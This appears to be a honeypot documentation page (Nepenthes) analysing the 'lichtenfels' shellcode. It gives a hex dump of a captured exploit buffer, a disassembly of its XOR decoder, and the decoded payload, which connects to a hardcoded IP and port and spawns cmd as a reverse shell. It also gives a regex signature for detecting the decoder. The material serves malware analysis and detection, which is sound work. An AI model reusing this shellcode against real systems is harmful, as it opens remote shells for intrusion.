000005e0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000005f0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000600: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000610: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000620: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000630: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000640: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000650: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000660: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000670: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000680: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000690: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000006a0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000006b0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000006c0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000006d0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000006e0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000006f0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000700: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000710: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000720: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000730: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000740: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000750: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000760: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000770: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000780: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000790: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000007a0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000007b0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000007c0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000007d0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000007e0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000007f0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000800: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000810: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000820: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000830: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000840: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000850: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000860: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000870: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000880: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000890: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000008a0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000008b0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000008c0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000008d0: eb 7e eb 7c 7e 15 00 01 - eb 76 eb 74 7e 15 00 01   ........ .v.t....
000008e0: eb 6e eb 6c 7e 15 00 01 - eb 66 eb 64 7e 15 00 01   .n.l.... .f.d....
000008f0: eb 5e eb 5c 7e 15 00 01 - eb 56 eb 54 7e 15 00 01   ........ .V.T....
00000900: eb 4e eb 4c 7e 15 00 01 - eb 46 eb 44 7e 15 00 01   .N.L.... .F.D....
00000910: eb 3e eb 3c 7e 15 00 01 - eb 36 eb 34 7e 15 00 01   ........ .6.4....
00000920: eb 2e eb 2c 7e 15 00 01 - eb 26 eb 24 7e 15 00 01   ........ ........
00000930: eb 1e eb 1c 7e 15 00 01 - eb 16 eb 14 7e 15 00 01   ........ ........
00000940: eb 0e eb 0c 7e 15 00 01 - eb 06 eb 04 7e 15 00 01   ........ ........
00000950: eb 02 eb 05 e8 f9 ff ff - ff 58 83 c0 1b 8d a0 01   ........ .X......
00000960: fc ff ff 83 e4 fc 8b ec - 33 c9 66 b9 a2 01 80 30   ........ 3.f....0
00000970: 93 40 e2 fa e8 77 00 00 - 00 47 65 74 50 72 6f 63   .....w.. .GetProc
00000980: 41 64 64 72 65 73 73 00 - 4c 6f 61 64 4c 69 62 72   Address. LoadLibr
00000990: 61 72 79 41 00 43 72 65 - 61 74 65 50 72 6f 63 65   aryA.Cre ateProce
000009a0: 73 73 41 00 43 6c 6f 73 - 65 48 61 6e 64 6c 65 00   ssA.Clos eHandle.
000009b0: 45 78 69 74 54 68 72 65 - 61 64 00 77 73 32 5f 33   ExitThre ad.ws2.3
000009c0: 32 00 57 53 41 53 74 61 - 72 74 75 70 00 57 53 41   2.WSASta rtup.WSA
000009d0: 53 6f 63 6b 65 74 41 00 - 63 6c 6f 73 65 73 6f 63   SocketA. closesoc
000009e0: 6b 65 74 00 63 6f 6e 6e - 65 63 74 00 63 6d 64 00   ket.conn ect.cmd.
000009f0: 5a b8 0c f0 fd 7f 8b 00 - 8b 70 1c ad 8b 40 08 8b   Z....... .p......
00000a00: d8 8b 73 3c 03 f3 8b 76 - 78 03 f3 8b 7e 20 03 fb   ..s....v x.......
00000a10: 8b 4e 14 33 ed 56 57 51 - 8b 3f 03 fb 8b f2 6a 0e   .N.3.VWQ ......j.
00000a20: 59 f3 a6 74 08 59 5f 83 - c7 04 45 e2 e9 59 5f 5e   Y..t.Y.. ..E..Y..
00000a30: 8b cd 8b 46 24 03 c3 d1 - e1 03 c1 33 c9 66 8b 08   ...F.... ...3.f..
00000a40: 8b 46 1c 03 c3 c1 e1 02 - 03 c1 8b 00 03 c3 8b fa   .F...... ........
00000a50: 8b f7 83 c6 0e 8b d0 6a - 04 59 8b f7 8b ec e8 9b   .......j .Y......
00000a60: 00 00 00 83 c6 0b 52 56 - ff 57 f0 5a 8b d8 33 c9   ......RV .W.Z..3.
00000a70: b1 04 e8 87 00 00 00 83 - c6 08 55 68 01 01 00 00   ........ ..Uh....
00000a80: ff 57 f0 85 c0 75 73 50 - 50 50 50 40 50 40 50 ff   .W...usP PPP.P.P.
00000a90: 57 f4 83 f8 ff 74 63 8b - d8 66 c7 45 00 02 00 66   W....tc. .f.E...f
00000aa0: c7 45 02 07 7f c7 45 04 - d9 9a 6e e6 6a 10 55 53   .E....E. ..n.j.US
00000ab0: ff 57 fc 85 c0 75 43 33 - c9 b1 11 57 8b fd f3 ab   .W...uC3 ...W....
00000ac0: 5f c7 45 00 44 00 00 00 - 89 5d 3c 89 5d 38 89 5d   ..E.D... .....8..
00000ad0: 40 c7 45 2c 01 01 00 00 - 8d 45 44 50 55 51 51 51   ..E..... .EDPUQQQ
00000ae0: 41 51 49 51 51 56 51 ff - 57 e4 ff 75 44 ff 57 e8   AQIQQVQ. W..uD.W.
00000af0: ff 75 48 ff 57 e8 53 ff - 57 f8 50 ff 57 ec 8a 06   .uH.W.S. W.P.W...
00000b00: 46 84 c0 75 f9 51 52 56 - 53 ff d2 5a 59 89 07 47   F..u.QRV S..ZY..G
00000b10: 47 47 47 e2 e9 c3 90 90 - 90 90 90 00 5c 00 43 00   GGG..... ......C.
00000b20: 24 00 5c 00 31 00 32 00 - 33 00 34 00 35 00 36 00   ....1.2. 3.4.5.6.
00000b30: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 31 00   1.1.1.1. 1.1.1.1.
00000b40: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 2e 00   1.1.1.1. 1.1.1...
00000b50: 64 00 6f 00 63 00 00 00 - 01 10 08 00 cc cc cc cc   d.o.c... ........
00000b60: 20 00 00 00 30 00 2d 00 - 00 00 00 00 88 2a 0c 00   ....0... ........
00000b70: 02 00 00 00 01 00 00 00 - 28 8c 0c 00 01 00 00 00   ........ ........
00000b80: 07 00 00 00 00 00 00 00 - 00                        ........ .

Analysis

XOR decoder "lichtenfels xor"

00000950 loc_950:
00000950                 jmp     short loc_954
00000952 ; ---------------------------------------------------------------------------
00000952
00000952 loc_952:
00000952                 jmp     short loc_959
00000954 ; ---------------------------------------------------------------------------
00000954
00000954 loc_954:
00000954                 call    loc_952
00000959
00000959 loc_959:
00000959                 pop     eax
0000095A                 add     eax, 1Bh
0000095D                 lea     esp, [eax-3FFh]
00000963                 and     esp, 0FFFFFFFCh
00000966                 mov     ebp, esp
00000968                 xor     ecx, ecx
0000096A                 mov     cx, 1A2h
0000096E
0000096E loc_96E:
0000096E                 xor     byte ptr [eax], 93h
00000971                 inc     eax
00000972                 loop    loc_96E

unxor'd shellcode

00000974                 call    loc_9F0
00000974 ; ---------------------------------------------------------------------------
00000979 aGetprocaddress db 'GetProcAddress',0
00000988 aLoadlibrarya   db 'LoadLibraryA',0
00000995 aCreateprocessa db 'CreateProcessA',0
000009A4 aClosehandle    db 'CloseHandle',0
000009B0 aExitthread     db 'ExitThread',0
000009BB aWs2_32         db 'ws2_32',0
000009C2 aWsastartup     db 'WSAStartup',0
000009CD aWsasocketa     db 'WSASocketA',0
000009D8 aClosesocket    db 'closesocket',0
000009E4 aConnect        db 'connect',0
000009EC aCmd            db 'cmd',0
000009F0 ; ---------------------------------------------------------------------------
000009F0
000009F0 loc_9F0:
000009F0                 pop     edx
000009F1                 mov     eax, 7FFDF00Ch  ; get Base of Kernel32
000009F6                 mov     eax, [eax]
000009F8
000009F8 loc_9F8:
000009F8                 mov     esi, [eax+1Ch]
000009FB                 lodsd
000009FC                 mov     eax, [eax+8]
000009FF
000009FF loc_9FF:                                ; goto Export Table
000009FF                 mov     ebx, eax
00000A01                 mov     esi, [ebx+3Ch]
00000A04                 add     esi, ebx
00000A06                 mov     esi, [esi+78h]
00000A09                 add     esi, ebx
00000A0B
00000A0B loc_A0B:
00000A0B                 mov     edi, [esi+20h]
00000A0E                 add     edi, ebx
00000A10                 mov     ecx, [esi+14h]
00000A13                 xor     ebp, ebp
00000A15                 push    esi
00000A16
00000A16 loc_A16:
00000A16                 push    edi
00000A17                 push    ecx
00000A18                 mov     edi, [edi]
00000A1A                 add     edi, ebx
00000A1C                 mov     esi, edx
00000A1E                 push    0Eh
00000A20                 pop     ecx
00000A21                 repe cmpsb
00000A23                 jz      short loc_A2D
00000A25                 pop     ecx
00000A26                 pop     edi
00000A27
00000A27 loc_A27:
00000A27                 add     edi, 4
00000A2A                 inc     ebp
00000A2B                 loop    loc_A16
00000A2D
00000A2D loc_A2D:
00000A2D                 pop     ecx
00000A2E                 pop     edi
00000A2F                 pop     esi
00000A30                 mov     ecx, ebp
00000A32                 mov     eax, [esi+24h]
00000A35                 add     eax, ebx
00000A37                 shl     ecx, 1
00000A39                 add     eax, ecx
00000A3B
00000A3B loc_A3B:
00000A3B                 xor     ecx, ecx
00000A3D
00000A3D loc_A3D:
00000A3D                 mov     cx, [eax]
00000A40
00000A40 loc_A40:
00000A40                 mov     eax, [esi+1Ch]
00000A43                 add     eax, ebx
00000A45                 shl     ecx, 2
00000A48                 add     eax, ecx
00000A4A                 mov     eax, [eax]
00000A4C                 add     eax, ebx
00000A4E                 mov     edi, edx
00000A50                 mov     esi, edi
00000A52                 add     esi, 0Eh
00000A55                 mov     edx, eax
00000A57                 push    4
00000A59                 pop     ecx
00000A5A                 mov     esi, edi
00000A5C                 mov     ebp, esp
00000A5E                 call    getProcAddr
00000A63                 add     esi, 0Bh
00000A66                 push    edx
00000A67                 push    esi
00000A68                 call    dword ptr [edi-10h] ; LoadLibrary
00000A6B                 pop     edx
00000A6C                 mov     ebx, eax
00000A6E                 xor     ecx, ecx
00000A70                 mov     cl, 4
00000A72                 call    getProcAddr
00000A77                 add     esi, 8
00000A7A                 push    ebp
00000A7B                 push    101h
00000A80                 call    dword ptr [edi-10h] ; WSAStartup
00000A83                 test    eax, eax
00000A85                 jnz     short loc_AFA
00000A87                 push    eax
00000A88                 push    eax
00000A89                 push    eax
00000A8A                 push    eax
00000A8B                 inc     eax
00000A8C                 push    eax
00000A8D                 inc     eax
00000A8E                 push    eax
00000A8F                 call    dword ptr [edi-0Ch] ; WSASocketA
00000A92                 cmp     eax, 0FFFFFFFFh
00000A95                 jz      short loc_AFA
00000A97                 mov     ebx, eax
00000A99                 mov     word ptr [ebp+0], 2 ; Type
00000A9F                 mov     word ptr [ebp+2], 7F07h ; Port
00000AA5                 mov     dword ptr [ebp+4], 0E66E9AD9h ; IP
00000AAC                 push    10h
00000AAE                 push    ebp
00000AAF                 push    ebx
00000AB0                 call    dword ptr [edi-4] ; connect
00000AB3                 test    eax, eax
00000AB5                 jnz     short loc_AFA
00000AB7                 xor     ecx, ecx
00000AB9                 mov     cl, 11h
00000ABB                 push    edi
00000ABC                 mov     edi, ebp
00000ABE                 rep stosd
00000AC0                 pop     edi
00000AC1                 mov     dword ptr [ebp+0], 44h ; 'D'
00000AC8                 mov     [ebp+3Ch], ebx
00000ACB                 mov     [ebp+38h], ebx
00000ACE                 mov     [ebp+40h], ebx
00000AD1                 mov     dword ptr [ebp+2Ch], 101h
00000AD8                 lea     eax, [ebp+44h]
00000ADB                 push    eax
00000ADC                 push    ebp
00000ADD                 push    ecx
00000ADE                 push    ecx
00000ADF                 push    ecx
00000AE0                 inc     ecx
00000AE1                 push    ecx
00000AE2                 dec     ecx
00000AE3                 push    ecx
00000AE4                 push    ecx
00000AE5                 push    esi
00000AE6                 push    ecx
00000AE7                 call    dword ptr [edi-1Ch] ; CreateProcessA
00000AEA                 push    dword ptr [ebp+44h]
00000AED                 call    dword ptr [edi-18h] ; CloseHandle
00000AF0                 push    dword ptr [ebp+48h]
00000AF3                 call    dword ptr [edi-18h] ; CloseHandle
00000AF6                 push    ebx
00000AF7                 call    dword ptr [edi-8] ; closesocket
00000AFA
00000AFA loc_AFA:
00000AFA                 push    eax
00000AFB                 call    dword ptr [edi-14h] ; ExitThread
00000AFE
00000AFE ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
00000AFE
00000AFE
00000AFE getProcAddr     proc near
00000AFE                 mov     al, [esi]
00000B00                 inc     esi
00000B01                 test    al, al
00000B03                 jnz     short getProcAddr
00000B05                 push    ecx
00000B06                 push    edx
00000B07                 push    esi
00000B08                 push    ebx
00000B09                 call    edx
00000B0B                 pop     edx
00000B0C                 pop     ecx
00000B0D                 mov     [edi], eax
00000B0F                 inc     edi
00000B10                 inc     edi
00000B11                 inc     edi
00000B12                 inc     edi
00000B13                 loop    getProcAddr
00000B15                 retn
00000B15 getProcAddr     endp

shellcode patterns

xor

 "(.*)(\\xEB\\x02\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x58\\x83\\xC0\\x1B\\x8D\\xA0"
 "\\x01\\xFC\\xFF\\xFF\\x83\\xE4\\xFC\\x8B\\xEC\\x33\\xC9\\x66\\xB9(..)\\x80\\x30(.)"
 "\\x40\\xE2\\xFA)(.*)$",

nepenthes

Development

Scene

Service

Misc

lichtenfels Shellcode

Shellcode

raw

unxor'd

Analysis

XOR decoder "lichtenfels xor"

unxor'd shellcode

shellcode patterns

xor

bindshell